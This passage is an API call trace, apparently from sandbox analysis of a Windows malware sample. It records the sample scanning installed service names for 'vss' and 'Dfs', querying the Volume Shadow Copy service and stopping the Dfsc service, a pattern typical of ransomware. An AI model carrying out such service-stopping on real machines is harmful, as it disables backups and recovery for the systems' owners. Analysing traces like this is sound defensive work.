[0090.720] StrStrIA (lpFirst="intelide", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="intelpep", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="intelppm", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="iorate", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IpFilterDriver", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="iphlpsvc", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IPMIDRV", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IPNAT", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="irda", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IRENUM", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="irmon", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="isapnp", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="iScsiPrt", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="kbdclass", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="kbdhid", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="kdnic", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="KeyIso", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="KSecDD", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="KSecPkg", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="ksthunk", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="KtmRm", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LanmanServer", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="lfsvc", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LicenseManager", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="lltdio", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="lltdsvc", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="lmhosts", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LSI_SAS", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LSI_SSS", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="LSM", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="luafv", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="MapsBroker", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="mausbhost", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="mausbip", lpSrch="vss") returned 0x0 [0090.721] StrStrIA (lpFirst="megasas", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="megasas2i", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="megasr", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mlx4_bus", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MMCSS", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="Modem", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="monitor", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mouclass", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mouhid", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mountmgr", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mpsdrv", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MpsSvc", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MRxDAV", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mrxsmb", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mrxsmb10", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mrxsmb20", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MsBridge", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MSDTC", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="Msfs", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="msgpiowin32", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mshidkmdf", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="mshidumdf", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="msisadrv", lpSrch="vss") returned 0x0 [0090.722] StrStrIA (lpFirst="MSiSCSI", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="msiserver", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MSKSSRV", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MsLldp", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MSPCLOCK", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MSPQM", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MsRPC", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MsSecFlt", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="mssmbios", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MSTEE", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="MTConfig", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="Mup", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="mvumis", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="NativeWifiP", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="NcaSvc", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="NcbService", lpSrch="vss") returned 0x0 [0090.723] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="vss") returned 0x0 [0090.724] OpenServiceA (hSCManager=0x355c588, lpServiceName="vmicvss", dwDesiredAccess=0x2c) returned 0x355c600 [0090.727] QueryServiceStatusEx (in: hService=0x355c600, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0090.727] CloseServiceHandle (hSCObject=0x355c600) returned 1 [0090.728] OpenServiceA (hSCManager=0x355c588, lpServiceName="VSS", dwDesiredAccess=0x2c) returned 0x355c4c0 [0090.728] QueryServiceStatusEx (in: hService=0x355c4c0, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0090.728] CloseServiceHandle (hSCObject=0x355c4c0) returned 1 [0090.840] OpenServiceA (hSCManager=0x355c588, lpServiceName="cdfs", dwDesiredAccess=0x2c) returned 0x355c678 [0090.841] QueryServiceStatusEx (in: hService=0x355c678, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0090.842] CloseServiceHandle (hSCObject=0x355c678) returned 1 [0090.842] OpenServiceA (hSCManager=0x355c588, lpServiceName="Dfsc", dwDesiredAccess=0x2c) returned 0x355c6f0 [0090.843] QueryServiceStatusEx (in: hService=0x355c6f0, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0090.865] GetTickCount () returned 0x1157e73 [0090.865] EnumDependentServicesA (in: hService=0x355c6f0, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x553fe84, lpServicesReturned=0x553fe74 | out: lpServices=0x0, pcbBytesNeeded=0x553fe84, lpServicesReturned=0x553fe74) returned 1 [0090.868] ControlService (in: hService=0x355c6f0, dwControl=0x1, lpServiceStatus=0x553fe2c | out: lpServiceStatus=0x553fe2c*(dwServiceType=0x2, dwCurrentState=0x3, dwControlsAccepted=0x1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0090.918] Sleep (dwMilliseconds=0x0) [0090.977] QueryServiceStatusEx (in: hService=0x355c6f0, InfoLevel=0x0, lpBuffer=0x553fe2c, cbBufSize=0x24, pcbBytesNeeded=0x553fe58 | out: lpBuffer=0x553fe2c, pcbBytesNeeded=0x553fe58) returned 1 [0090.978] GetTickCount () returned 0x1157ee1 [0090.978] CloseServiceHandle (hSCObject=0x355c6f0) returned 1 [0090.978] StrStrIA (lpFirst="Dhcp", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="DiagTrack", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="Disk", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="dmvsc", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="dmwappushservice", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="Dnscache", lpSrch="Dfs") returned 0x0 [0090.978] StrStrIA (lpFirst="DoSvc", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="dot3svc", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="DPS", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="drmkaud", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="DsmSvc", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="DsSvc", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="DusmSvc", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="DXGKrnl", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="e1iexpress", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EapHost", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="ebdrv", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EFS", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EhStorClass", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="embeddedmode", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EntAppSvc", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="ErrDev", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EventLog", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="EventSystem", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="exfat", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="fastfat", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="Fax", lpSrch="Dfs") returned 0x0 [0090.979] StrStrIA (lpFirst="fdc", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="fdPHost", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FDResPub", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="fhsvc", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FileCrypt", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FileInfo", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="Filetrace", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="flpydisk", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FltMgr", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FontCache", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FrameServer", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="FsDepends", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="fvevol", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="gencounter", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="genericusbfn", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="GPIOClx0101", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="gpsvc", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="gupdate", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="gupdatem", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="HdAudAddService", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="HDAudBus", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="HidBatt", lpSrch="Dfs") returned 0x0 [0090.980] StrStrIA (lpFirst="HidBth", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="hidi2c", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="hidinterrupt", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HidIr", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="hidserv", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HidUsb", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HomeGroupListener", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HpSAMD", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HTTP", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="HvHost", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="hvservice", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="hwpolicy", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="hyperkbd", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="i8042prt", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iagpio", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iai2c", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="Dfs") returned 0x0 [0090.981] StrStrIA (lpFirst="iaStorAV", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="iaStorV", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="ibbus", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="icssvc", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IKEEXT", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IndirectKmd", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="intelide", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="intelpep", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="intelppm", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="iorate", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IpFilterDriver", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="iphlpsvc", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IPMIDRV", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IPNAT", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IpxlatCfgSvc", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="irda", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="IRENUM", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="irmon", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="isapnp", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="iScsiPrt", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="kbdclass", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="kbdhid", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="kdnic", lpSrch="Dfs") returned 0x0 [0090.982] StrStrIA (lpFirst="KeyIso", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="KSecDD", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="KSecPkg", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="ksthunk", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="KtmRm", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LanmanServer", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LanmanWorkstation", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="lfsvc", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LicenseManager", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="lltdio", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="lltdsvc", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="lmhosts", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LSI_SAS", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LSI_SAS2i", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LSI_SAS3i", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LSI_SSS", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="LSM", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="luafv", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="MapsBroker", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="mausbhost", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="mausbip", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="megasas", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="megasas2i", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="megasr", lpSrch="Dfs") returned 0x0 [0090.983] StrStrIA (lpFirst="mlx4_bus", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MMCSS", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="Modem", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="monitor", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mouclass", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mouhid", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mountmgr", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MozillaMaintenance", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mpsdrv", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MpsSvc", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MRxDAV", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mrxsmb", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mrxsmb10", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mrxsmb20", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MsBridge", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MSDTC", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="Msfs", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="msgpiowin32", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mshidkmdf", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="mshidumdf", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="msisadrv", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MSiSCSI", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="msiserver", lpSrch="Dfs") returned 0x0 [0090.984] StrStrIA (lpFirst="MSKSSRV", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MsLldp", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MSPCLOCK", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MSPQM", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MsRPC", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MsSecFlt", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="mssmbios", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MSTEE", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="MTConfig", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="Mup", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="mvumis", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NativeWifiP", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NaturalAuthentication", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NcaSvc", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NcbService", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NcdAutoSetup", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="ndfltr", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NDIS", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NdisCap", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NdisImPlatform", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NdisTapi", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="Ndisuio", lpSrch="Dfs") returned 0x0 [0090.985] StrStrIA (lpFirst="NdisVirtualBus", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NdisWan", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="ndiswanlegacy", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="ndproxy", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="Ndu", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NetAdapterCx", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NetBIOS", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NetBT", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="Netlogon", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="Netman", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="netprofm", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NetSetupSvc", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NetTcpPortSharing", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="netvsc", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NgcCtnrSvc", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NgcSvc", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NlaSvc", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="Npfs", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="npsvctrig", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="nsi", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="nsiproxy", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="NTFS", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="Null", lpSrch="Dfs") returned 0x0 [0090.986] StrStrIA (lpFirst="nvdimmn", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="nvraid", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="nvstor", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="ose64", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="p2pimsvc", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="p2psvc", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="Parport", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="partmgr", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="PcaSvc", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="pci", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="pciide", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="pcmcia", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="pcw", lpSrch="Dfs") returned 0x0 [0090.987] StrStrIA (lpFirst="pdc", lpSrch="Dfs") returned 0x0 [0091.027] StrStrIA (lpFirst="PEAUTH", lpSrch="Dfs") returned 0x0 [0091.027] StrStrIA (lpFirst="PeerDistSvc", lpSrch="Dfs") returned 0x0 [0091.027] StrStrIA (lpFirst="percsas2i", lpSrch="Dfs") returned 0x0 [0091.027] StrStrIA (lpFirst="percsas3i", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PerfHost", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PhoneSvc", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="pla", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PlugPlay", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="pmem", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PNRPAutoReg", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PNRPsvc", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PolicyAgent", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="Power", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PptpMiniport", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="PrintNotify", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="Processor", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="ProfSvc", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="Psched", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="QWAVE", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="QWAVEdrv", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="RasAcd", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="RasAgileVpn", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="RasAuto", lpSrch="Dfs") returned 0x0 [0091.028] StrStrIA (lpFirst="Rasl2tp", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RasMan", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RasPppoe", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="RasSstp", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="rdbss", lpSrch="Dfs") returned 0x0 [0091.029] StrStrIA (lpFirst="rdpbus", lpSrch="Dfs") returned 0x0 [0091.029] 